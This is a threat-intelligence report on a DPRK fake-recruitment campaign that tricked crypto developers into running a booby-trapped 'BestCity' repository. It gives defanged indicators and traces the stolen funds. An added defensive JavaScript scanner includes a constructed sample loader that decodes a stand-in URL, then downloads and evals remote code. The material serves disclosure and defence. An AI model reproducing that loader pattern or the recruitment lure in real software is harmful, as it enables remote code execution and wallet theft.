DPRK “Contagious Interview” BestCity Campaign Targets Crypto Developers via Fake Recruitment Test

  • julia05126
  • Nov 13

We have identified a new Contagious Interview repository, operated by DPRK, that was recently active and successfully compromised cryptocurrency developers. The attackers posed as legitimate recruiters, ran a convincing hiring process through LinkedIn, and ultimately directed candidates to clone and run a malicious Bitbucket repository, the “BestCity” project. Running this code silently installs BeaverTail-family infostealer malware, leading to the theft of browser-based crypto wallets. We have confirmed multiple victim wallet drains in late October.


Background

In the latest Contagious Interview campaign, crypto developers were approached on LinkedIn by profiles posing as legitimate recruiters. Victims were invited to an interview, sent a calendar link, and then asked to complete a “take-home” coding assignment before the meeting: clone a repository and run it locally to “speed up” the hiring process. That request was the trap: running the repository executed a hidden loader that fetched a malicious payload and compromised browser wallets on the developer's computer.


The fake project currently in use is referred to as BestCity and is pictured below.


[Screenshot: the BestCity repository as presented to candidates]

BestCity was presented as a harmless demo/web project, hosted on Bitbucket. The repository looks like a normal developer deliverable (React frontend, small Node server, package.json, etc.) and is packaged so it can be shared easily with candidates during an interview process. On the surface it reads like a legitimate coding exercise or demo that a hiring manager might ask an applicant to clone and run locally.


How legitimate platforms are being leveraged

The attackers used legitimate services to make the lure seem trustworthy. The repo itself, now taken down, was hosted on Bitbucket, a well-known source control platform; the second-stage payload was hosted on npoint.io (a legitimate JSON-storage/hosting service). Because both services are commonly used by developers, their presence lowers suspicion — recipients see recognizable domains and assume the artifacts are safe.


zeroShadow investigation

The image below shows the exact lines where the malicious code lived inside the BestCity package. At first glance it looks innocuous — a few lines of numbers and some standard Node APIs — but in context this block is a remote code loader that runs automatically when the controller is loaded.


[Screenshot: the loader block inside the BestCity package]

The small numeric array in the screenshot is a list of ASCII character codes that, when decoded, spells out a hidden download URL: hxxps[://]api[.]npoint[.]io/2c45861239c3b2031fb9. That URL delivered a heavily obfuscated JavaScript infostealer (SHA-256 5428407c681c5a82112d4c75ff59967faaebc3933550ed3d88ae0afff8ea98ff) that harvests browser wallet data and exfiltrates it to attacker infrastructure; VirusTotal and multiple vendors flag the sample as a JS infostealer. See the VT entry for the sample here (safe review link):
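The loader pattern described above (an array of character codes that decodes to a URL, sitting next to code that downloads and executes whatever comes back) is cheap to triage statically before anything in a cloned repository is run. The following is an added example written for this page, not zeroShadow's code and not code from the BestCity repository: it scans a JavaScript source string for numeric arrays that decode to a URL and for execution-related APIs in the same file, and flags the file when both are present. The two sample sources, the `example.invalid` URL and the function names are constructed for the demonstration; nothing here is the real payload.

```javascript
// Added example (not zeroShadow's code): static triage of a cloned repository
// for the loader pattern described above. A file is flagged when a numeric
// array of printable ASCII codes decodes to a URL AND the same file uses at
// least two fetch/execute APIs (eval, new Function, child_process,
// require('https'), String.fromCharCode). All sample sources are constructed.

// Eight or more small integers in one array literal (shorter arrays are too
// noisy to be useful as a URL-smuggling indicator).
const NUMERIC_ARRAY = /\[\s*(\d{1,3}\s*(?:,\s*\d{1,3}\s*){7,})\]/g;
const URL_RE = /https?:\/\/[^\s'"]+/;
const EXEC_APIS = [
  /\beval\s*\(/,
  /new\s+Function\s*\(/,
  /\bchild_process\b/,
  /\brequire\s*\(\s*['"]https?['"]\s*\)/,
  /\bString\.fromCharCode\b/,
];

// Turn "104,116,..." into a string, or null if any value is not printable ASCII.
function decodeCharCodes(arrayBody) {
  const codes = arrayBody.split(',').map((n) => parseInt(n.trim(), 10));
  if (codes.some((c) => Number.isNaN(c) || c < 32 || c > 126)) return null;
  return String.fromCharCode(...codes);
}

// 1-based line number of a character offset, for reporting.
function lineOf(source, index) {
  return source.slice(0, index).split('\n').length;
}

// Returns every URL recovered from numeric arrays, the execution-related APIs
// present in the file, and a verdict that requires both signals together.
function scanSource(source) {
  const findings = [];
  for (const m of source.matchAll(NUMERIC_ARRAY)) {
    const decoded = decodeCharCodes(m[1]);
    if (decoded === null) continue;
    const url = decoded.match(URL_RE);
    if (url) findings.push({ line: lineOf(source, m.index), url: url[0] });
  }
  const apis = EXEC_APIS.filter((re) => re.test(source)).map((re) => re.source);
  return { findings, apis, suspicious: findings.length > 0 && apis.length >= 2 };
}

// Constructed stand-in for a loader; the array spells https://example.invalid/stage2
const SAMPLE_LOADER = `
// constructed sample, not the real BestCity code
const https = require('https');
const parts = [104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,115,116,97,103,101,50];
https.get(String.fromCharCode(...parts), (res) => {
  let body = '';
  res.on('data', (chunk) => { body += chunk; });
  res.on('end', () => eval(body));
});
`;

// Constructed benign file: a numeric array that is just data, no network or eval.
const SAMPLE_CLEAN = `
const PALETTE = [255, 128, 0, 64, 32, 16, 8, 4, 2, 1];
module.exports = { PALETTE };
`;

console.log(JSON.stringify(scanSource(SAMPLE_LOADER), null, 2));
console.log(JSON.stringify(scanSource(SAMPLE_CLEAN), null, 2));
```

Run `scanSource` over every `.js`/`.ts` file in the clone before `npm install` or `npm start`, since both package lifecycle scripts and application entry points execute code. The heuristic is deliberately narrow: it catches the char-code array seen in this campaign but not hex or base64 escapes, split-string concatenation, or strings stored in a separate data file, so a clean result is not a clearance; any repository received from a recruiter should still only be executed inside a disposable VM with no wallets, browser profiles or credentials on it.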



Blockchain findings

The following graphic shows how one victim's funds were moved on the blockchain. Shortly after the BeaverTail malware was executed, the victim’s assets were rapidly drained from their BNB wallet. The stolen funds were then moved across chains — both native tokens and stablecoins — using several decentralized bridging services, as illustrated in the Chainalysis Reactor (Next Gen Beta) screenshot below.


[Screenshot: Chainalysis Reactor (Next Gen Beta) graph of the victim's fund flows]

The stolen assets were subsequently commingled with funds from both unknown sources and wallets previously linked to confirmed Contagious Interview operations. Ultimately, the consolidated funds were bridged to the Tron network as USDT, where they were moved towards cash-out.


Indicators of Compromise

  • hxxps[://]docs[.]google[.]com/document/d/15b_1_ggtV9Lg3QUl7FhRtdc7qG9rQI2-sSiRz47fxHw
  • hxxps[://]bitbucket[.]org/0x5softwaredev/demo_version/src/main/
  • hxxps[://]api[.]npoint[.]io/2c45861239c3b2031fb9
  • hxxps[://]api[.]npoint[.]io/40f8db39f70e559adcbc
  • 23[.]227[.]203[.]204


Original article by the zeroShadow team
